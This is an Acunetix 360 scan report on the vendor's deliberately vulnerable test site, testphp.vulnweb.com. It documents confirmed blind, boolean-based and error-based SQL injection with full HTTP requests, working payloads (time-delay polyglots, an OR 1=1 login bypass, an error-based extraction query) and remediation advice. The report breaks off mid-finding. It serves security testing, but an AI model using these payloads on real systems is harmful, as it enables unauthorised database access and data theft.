Acunetix 360 Scan Report for http://testphp.vulnweb.com/

CVSS 3.0 SCORE
Base	10 (Critical)
Temporal	10 (Critical)
Environmental	10 (Critical)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 3.1 SCORE
Base	10 (Critical)
Temporal	10 (Critical)
Environmental	10 (Critical)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

2. Blind SQL Injection

CRITICAL

CONFIRMED

Acunetix 360 identified a Blind SQL Injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.

This is an extremely common vulnerability and its successful exploitation can have critical implications.

Acunetix 360 confirmed the vulnerability by executing a test SQL query on the backend database. In these tests, SQL injection was not obvious, but the different responses from the page based on the injection test allowed us to identify and confirm the SQL injection.

Impact

Depending on the backend database, the database connection settings, and the operating system, an attacker can mount one or more of the following attacks successfully:

Reading, updating and deleting arbitrary data or tables from the database
Executing commands on the underlying operating system

Vulnerabilities

2.1. http://testphp.vulnweb.com/cart.php

CONFIRMED

Method	Parameter	Value
POST	price	500
POST	addcart	1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'\|"XOR(((SEL...

Request Response Go to the highlighted output

Request

POST /cart.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 172
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/product.php?pic=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

price=500&addcart=1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f

Response

Response Time (ms) : 50307.0159

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 18:38:11 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>you cart</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
		<a href="guestbook.php">guestb
…

2.2. http://testphp.vulnweb.com/search.php?test=query

CONFIRMED

Method	Parameter	Value
POST	searchFor	1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'\|"XOR(((SEL...
POST	goButton	go
POST	test	query

Request Response Go to the highlighted output

Request

POST /search.php?test=query HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 176
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

searchFor=1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f&goButton=go

Response

Response Time (ms) : 50901.8668

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 17:57:54 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>search</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
		<a href="guestbook.php">guestboo
…

2.3. http://testphp.vulnweb.com/search.php?test=query%20%2b%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))%2f*%27XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%22*%2f

CONFIRMED

Method	Parameter	Value
POST	searchFor
POST	goButton	go
POST	test	query + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'\|"XOR((...

Request Response Go to the highlighted output

Request

POST /search.php?test=query%20%2b%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))%2f*%27XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%22*%2f HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 22
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

searchFor=&goButton=go

Response

Response Time (ms) : 25250.9533

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 18:08:44 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>search</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
		<a href="guestbook.php">guestboo
…

Show Remediation Hide Remediation

Actions to Take

See the remedy for solution.
If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
Locate the all dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
Use your weblogs and application logs to see if there were any previous but undetected attacks to this resource.

Remedy

A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.

External References

Remedy References

CLASSIFICATION

HIPAA

CVSS 3.0 SCORE
Base	8.6 (High)
Temporal	8.6 (High)
Environmental	8.6 (High)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVSS 3.1 SCORE
Base	8.6 (High)
Temporal	8.6 (High)
Environmental	8.6 (High)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

3. Boolean Based SQL Injection

CRITICAL

CONFIRMED

Acunetix 360 identified a Boolean-Based SQL Injection, which occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database.

This is an extremely common vulnerability and its successful exploitation can have critical implications.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Reading, updating and deleting arbitrary data/tables from the database
Executing commands on the underlying operating system

Vulnerabilities

3.1. http://testphp.vulnweb.com/AJAX/infoartist.php?id=2%20OR%2017-7%3d10

CONFIRMED

Method	Parameter	Value
GET	id	2 OR 17-7=10

Proof of Exploit

Identified Database Version (cached)

5.1.73-0ubuntu0.10.04.

Identified Database User (cached)

acuart@localhost

Identified Database Name (cached)

acuart

Request Response Go to the highlighted output

Request

GET /AJAX/infoartist.php?id=2%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: mycookie=3; login=test%2Ftest
Referer: http://testphp.vulnweb.com/AJAX/index.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 106.4251

Total Bytes Received : 195

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/xml
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 18:18:30 GMT

<iteminfo><name>r4w8173</name><description>&lt;p&gt;
Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
    Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis
    nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.
    Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.
    Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a
    mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad
    litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.
    Mauris magna eros, semper a, tempor et, rutrum et, tortor.
&lt;/p&gt;
&lt;p&gt;
Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
    Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis
    nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.
    Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.
    Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a
    mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad
    litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.
    Mauris magna eros, semper a, tempor et, rutrum et, tortor.
&lt;/p&gt;</description></iteminfo>

3.2. http://testphp.vulnweb.com/artists.php?artist=1%20OR%2017-7%3d10

CONFIRMED

Method	Parameter	Value
GET	artist	1 OR 17-7=10

Proof of Exploit

Identified Database Version

5.1.73-0ubuntu0.10.04.

Identified Database User

acuart@localhost

Identified Database Name

acuart

Request Response Go to the highlighted output

Request

GET /artists.php?artist=1%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/artists.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 288.554

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 18:02:09 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>artists</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
		<a href="guestbook.php">guestbo
…

3.3. http://testphp.vulnweb.com/product.php?pic=1%20OR%2017-7%3d10

CONFIRMED

Method	Parameter	Value
GET	pic	1 OR 17-7=10

Proof of Exploit

Identified Database Version (cached)

5.1.73-0ubuntu0.10.04.

Identified Database User (cached)

acuart@localhost

Identified Database Name (cached)

acuart

Request Response Go to the highlighted output

Request

GET /product.php?pic=1%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 4327.2635

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 18:21:53 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>picture details</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<script language="javascript1.2">
<!--
	function popUpWindow(URLStr, left, top, width, height)
	{
	  window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+'');
	}
-->
</script>
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav
…

3.4. http://testphp.vulnweb.com/userinfo.php

CONFIRMED

Method	Parameter	Value
POST	pass	-1' OR 1=1 OR 'ns'='ns
POST	uname	Smith

Proof of Exploit

Identified Database Version (cached)

5.1.73-0ubuntu0.10.04.

Identified Database User (cached)

acuart@localhost

Identified Database Name (cached)

acuart

Request Response Go to the highlighted output

Request

POST /userinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 51
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

pass=-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns&uname=Smith

Response

Response Time (ms) : 233.4751

Total Bytes Received : 247

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Set-Cookie: login=test%2Ftest
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 18:11:39 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>user info</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 

…

3.5. http://testphp.vulnweb.com/userinfo.php

CONFIRMED

Method	Parameter	Value
POST	pass	Inv1@cti
POST	uname	-1' OR 1=1 OR 'ns'='ns

Proof of Exploit

Identified Database Version (cached)

5.1.73-0ubuntu0.10.04.

Identified Database User (cached)

acuart@localhost

Identified Database Name (cached)

acuart

Request Response Go to the highlighted output

Request

POST /userinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

pass=Inv1%40cti&uname=-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns

Response

Response Time (ms) : 235.8045

Total Bytes Received : 247

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Set-Cookie: login=test%2Ftest
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 18:21:48 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>user info</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 

…

Show Remediation Hide Remediation

Actions to Take

See the remedy for solution.
If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
Use your weblogs and application logs to see if there were any previous but undetected attacks to this resource.

Remedy

The best way to protect your code against SQL injections is using parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

External References

Remedy References

CLASSIFICATION

HIPAA

CVSS 3.0 SCORE
Base	10 (Critical)
Temporal	10 (Critical)
Environmental	10 (Critical)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 3.1 SCORE
Base	10 (Critical)
Temporal	10 (Critical)
Environmental	10 (Critical)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

4. SQL Injection

CRITICAL

CONFIRMED

Acunetix 360 identified an SQL Injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.

This is an extremely common vulnerability and its successful exploitation can have critical implications.

Acunetix 360 confirmed the vulnerability by executing a test SQL query on the backend database.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Reading, updating and deleting arbitrary data or tables from the database
Executing commands on the underlying operating system

Vulnerabilities

4.1. http://testphp.vulnweb.com/listproducts.php?artist=-1%20or%201%3d1%20and%20(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)

CONFIRMED

Method	Parameter	Value
GET	artist	-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHA...

Proof of Exploit

Identified Database Version

5.1.73-0ubuntu0.10.04.1

Identified Database Name

acuart

Identified Database User

acuart@localhost

Request Response Go to the highlighted output

Request

